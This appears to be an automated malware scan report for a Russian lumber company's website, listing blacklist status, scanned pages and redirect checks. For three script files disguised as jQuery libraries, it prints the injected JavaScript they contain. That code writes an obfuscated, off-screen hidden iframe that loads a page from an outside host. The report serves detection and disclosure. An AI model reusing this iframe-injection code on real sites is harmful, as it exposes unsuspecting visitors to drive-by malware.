Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=massiv-nord.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://massiv-nord.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://massiv-nord.ru/ | 200 OK Content-Length: 24947 Content-Type: text/html | clean |
http://massiv-nord.ru/assets/templates/site/scripts/jquery-1.4.1.min.js | 200 OK Content-Length: 2585 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://xorenam.firarumahbusana.com/hbcxvsafwegrshhtrsj12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://massiv-nord.ru/assets/templates/site/scripts/jquery.jcarousel.pack.js | 200 OK Content-Length: 2585 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://xorenam.firarumahbusana.com/hbcxvsafwegrshhtrsj12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://massiv-nord.ru/assets/templates/site/scripts/jquery.jcarousel.setup.js | 200 OK Content-Length: 2585 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!browserData()) { var cookie = getCookie('jungleposter3r38fment17ashfeuajsle'); if (cookie == undefined) { setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001); document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://xorenam.firarumahbusana.com/hbcxvsafwegrshhtrsj12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Antivirus reports:
| ||
http://massiv-nord.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://massiv-nord.ru/about.html | 200 OK Content-Length: 24817 Content-Type: text/html | clean |
http://counter.rambler.ru/top100.jcn?2665533 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://massiv-nord.ru/uslugi.html | 200 OK Content-Length: 26343 Content-Type: text/html | clean |
http://massiv-nord.ru/uslugi/prodaja-pilomaterialov.html | 200 OK Content-Length: 40053 Content-Type: text/html | clean |
http://massiv-nord.ru/uslugi/ | HTTP/1.1 301 Moved Permanently Cache-Control: private, must-revalidate Connection: close Date: Wed, 27 Aug 2014 01:21:30 GMT Location: /uslugi.html Server: nginx/1.6.0 Content-Length: 0 Content-Type: text/html; charset=utf-8 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Set-Cookie: SN4bbd93e54b432=d7f4601a6cc5941ca958eff4c82e94fb; path=/ Set-Cookie: SN4bbd93e54b432=d7f4601a6cc5941ca958eff4c82e94fb; path=/ X-Powered-By: PHP/5.3.18 | clean |
http://massiv-nord.ru/test404page.js | 404 Not Found Content-Length: 1439 Content-Type: text/html | clean |
http://massiv-nord.ru/kontaktnaya-informacziya.html | 200 OK Content-Length: 18901 Content-Type: text/html | clean |
http://massiv-nord.ru/uslugi/suchka-pilomaterialov.html | 200 OK Content-Length: 25631 Content-Type: text/html | clean |
http://massiv-nord.ru/uslugi/izgotovlenie-mebelnix-shitov.html | 200 OK Content-Length: 62225 Content-Type: text/html | clean |
http://massiv-nord.ru/prajs-na-uslugi.html | 200 OK Content-Length: 78373 Content-Type: text/html | clean |
http://massiv-nord.ru/prajs-na-uslugi/prajs-na-pilomaterialyi.html | 200 OK Content-Length: 33861 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: massiv-nord.ru
Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Wed, 27 Aug 2014 01:21:25 GMT
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4bbd93e54b432=b6c7a6d302bb50989f6e9035dbf7c7f4; path=/
Set-Cookie: SN4bbd93e54b432=b6c7a6d302bb50989f6e9035dbf7c7f4; path=/
X-Powered-By: PHP/5.3.18
GET / HTTP/1.1
Host: massiv-nord.ru
Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Wed, 27 Aug 2014 01:21:25 GMT
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4bbd93e54b432=b6c7a6d302bb50989f6e9035dbf7c7f4; path=/
Set-Cookie: SN4bbd93e54b432=b6c7a6d302bb50989f6e9035dbf7c7f4; path=/
X-Powered-By: PHP/5.3.18
Second query (visit from search engine):
GET / HTTP/1.1
Host: massiv-nord.ru
Referer: http://www.google.com/search?q=massiv-nord.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: massiv-nord.ru
Referer: http://www.google.com/search?q=massiv-nord.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.